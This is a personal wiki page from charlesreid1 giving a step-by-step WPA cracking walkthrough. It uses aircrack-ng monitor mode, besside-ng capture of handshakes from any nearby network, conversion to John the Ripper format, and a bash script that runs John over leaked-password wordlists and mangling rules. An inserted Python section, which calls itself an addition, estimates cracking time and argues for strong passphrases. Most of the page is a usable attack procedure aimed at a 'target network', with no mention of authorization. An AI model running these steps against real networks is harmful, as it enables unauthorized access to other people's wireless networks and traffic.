From charlesreid1

Reboot

Revisiting some of the old techniques.

Classic WPA Cracking

Monitor wireless

First, use the aircrack-ng suite to monitor wifi networks.

Start by putting the wifi card in monitor mode:

$ ifconfig wlan1 down; iwconfig wlan1 mode monitor; ifconfig wlan1 up

Now you can use that interface to scan for wireless network activity:

$ airodump-ng -w output_file wlan1

This will output information about wireless network activity to a file.

Obtain handshakes

You can use airodump-ng to monitor wireless activity and verify that there are, in fact, clients connected to networks - a critical component in obtaining handshakes. The next step is to use besside-ng to obtain handshakes the Joe Pesci way.

Specify -W for wpa only, and specify your network interface:

$ besside-ng -W wlan1

That will put handshakes in a cap file, and the name of networks whose handshakes were obtained in a log file.

Crack handshakes

Once we have the handshakes, use the instructions on the John the Ripper/WPA page to turn those cap files into hccap files, then into John the Ripper password files.

$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap
$ hccap2john ./wpa.hccap > booty.johnpw

Now the goal is to crack booty.johnpw with John the Ripper. To do this, we will need to try a variety of wordlists, and a variety of rulesets to modify the words in the wordlists. To do that, use a bash script:

#!/bin/bash
# bash (not /bin/sh) is required: the script uses arrays and "${arr[@]}" expansion

# seclist passwords located in
# ~/codes/SecLists/Passwords
#
johndir="/usr/sbin"
johnbin="${johndir}/john"

pwdir="/root/box/08_besside"

# Round 0: plain wordlists, no mangling rules
rulesets=("")

#### Round 1
###rulesets=("KoreLogicRulesAppendYears")

#### Round 2
###rulesets=("KoreLogicRulesAppendYears"
###"KoreLogicRulesAppendNum"
###"KoreLogicRulesPrependNum"
###"KoreLogicRulesAppendNumNum"
###"KoreLogicRulesPrependNumNum"
###"KoreLogicRulesPrependYears"
###)

# a good selection of seclist passwords:
# phpbb.txt
# elitehacker.txt
# alleged-gmail-passwords.txt
# Sucuri_Top_Wordpress_Passwords.txt
# korelogic-password.txt
# hak5.txt
# rockyou.txt

wordlists=("/root/codes/SecLists/Passwords/phpbb.txt"
"/root/codes/SecLists/Passwords/elitehacker.txt"
"/root/codes/SecLists/Passwords/alleged-gmail-passwords.txt"
"/root/codes/SecLists/Passwords/Sucuri_Top_Wordpress_Passwords.txt"
"/root/codes/SecLists/Passwords/korelogic-password.txt"
"/root/codes/SecLists/Passwords/hak5.txt"
"/root/codes/SecLists/Passwords/rockyou.txt")

# ===========================
# The Actual Work

# glob directly instead of parsing `ls` output, so paths with spaces survive
for pwfile in "${pwdir}"/*.johnpw; do
    echo ""
    echo ""
    echo "*** * * ** **** * ***** ** **  * * * ** ****"
    echo "* ** * *** **** ***  * ** ** *** * * * *** *"
    echo "  * ***** *  * * * *** * * * * *  ***  * * *"
    echo "* * * * * * *** **** * *** * * * * * * *** *"
    echo ""
    echo ""
    echo "Now on password file ${pwfile}"
    echo ""

    for rules in "${rulesets[@]}"; do
        echo ""
        echo ""
        echo " .. . .. . .... ... . . ... .. . .. . . .  ."
        echo "... ... .. ...... . .. .  . .   ....  .... ."
        echo "... .  .. .  .  .  .. .... . .  . . . ... . "
        echo ""
        echo ""
        echo "Now on ruleset file ${rules}"
        echo ""

        for wordlist in "${wordlists[@]}"; do
            echo ""
            echo "---------------------------"
            echo "Running John the Ripper with options:"
            echo "Wordlist: ${wordlist}"
            echo "Ruleset: ${rules}"
            echo "Password File: ${pwfile}"

            if [ -z "${rules}" ]; then

                # print the command first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}"

                # actually do it; the subshell cd means we come back to the
                # original directory even if john fails
                ( cd "${johndir}" && "${johnbin}" --wordlist="${wordlist}" --format=wpapsk "${pwfile}" )

            else
                # print the command first
                echo "${johnbin} --wordlist=${wordlist} --format=wpapsk --rules=${rules} ${pwfile}"

                # actually do it
                ( cd "${johndir}" && "${johnbin}" --rules="${rules}" --wordlist="${wordlist}" --format=wpapsk "${pwfile}" )

            fi

        done
    done
done

Settle in, because we'll be here a while.
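Why it takes a while, as an added example that is not part of the original page: every candidate the loop above feeds to john has to go through the WPA/WPA2-PSK key derivation from IEEE 802.11i, PBKDF2-HMAC-SHA1 with 4096 iterations keyed by the SSID, before it can be checked against the handshake. The script below computes that derivation (checked against the standard's published test vector, passphrase "password" and SSID "IEEE"), measures how many derivations a single CPU thread manages, and turns a candidate count into a time estimate. The per-second rate and the wordlist sizes it assumes are constructed illustrations, not measurements from the author's setup; the defender's point is that the cost per guess is fixed, so the only lever is how many guesses a passphrase forces.

```python
import hashlib
import time


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit WPA/WPA2 PSK (the PMK) exactly as IEEE 802.11i specifies:
    PBKDF2-HMAC-SHA1, salt = SSID, 4096 iterations, 32-byte output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def candidates_per_second(samples: int = 20) -> float:
    """Measure single-threaded derivations per second on this machine.
    The SSID and candidate strings are constructed for the benchmark only."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_psk(f"candidate{i:06d}", "benchmark-ssid")
    elapsed = time.perf_counter() - start
    return samples / elapsed


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of passphrases of a given length over an alphabet
    (a random passphrase forces an attacker through this many guesses on average / 2)."""
    return alphabet_size ** length


def estimate_seconds(num_candidates: int, rate_per_second: float) -> float:
    """Worst-case wall clock time to try every candidate at the given rate."""
    return num_candidates / rate_per_second


def human(seconds: float) -> str:
    """Render a duration in the largest sensible unit."""
    for unit, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:,.1f} seconds"


if __name__ == "__main__":
    # Sanity check against the 802.11i test vector (passphrase "password", SSID "IEEE")
    print("PMK(password, IEEE) =", wpa_psk("password", "IEEE").hex())

    rate = candidates_per_second()
    print(f"this CPU, one thread: {rate:,.0f} candidates/s")

    # Constructed figures: roughly the line count of rockyou.txt, and a guess
    # at how many variants a mangling ruleset produces per word.
    rockyou_lines = 14_000_000
    variants_per_rule = 10
    total = rockyou_lines * variants_per_rule
    print(f"rockyou x one ruleset: {total:,} candidates -> {human(estimate_seconds(total, rate))}")

    # Versus a random 12-character passphrase over upper/lower/digits (62 symbols)
    random12 = keyspace(62, 12)
    print(f"random 12-char passphrase: {random12:,} candidates -> {human(estimate_seconds(random12, rate))}")
```

The derivation is the slow, fixed part of every WPA cracking tool, which is why GPU boxes and pre-computed PMK tables only ever shave the constant and never the exponent; a passphrase that is not in any wordlist and not a short rule-mangled variant of one is the mitigation that actually moves the estimate.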

Alternatives to Cracking WPA

So you don't wanna rent out a GPU box, spend a week trimming your fingernails, and spend the entire time hoping that somehow, magically, you'll nail the one-in-a-bazillion-million chance you'll get it. That's understandable. Let's talk about alternative options. These are going to depend primarily on your target network and your scenario. For example, what kind of physical access to the primary wireless networking area do you have? What kind of antenna(s) are you using?

Flags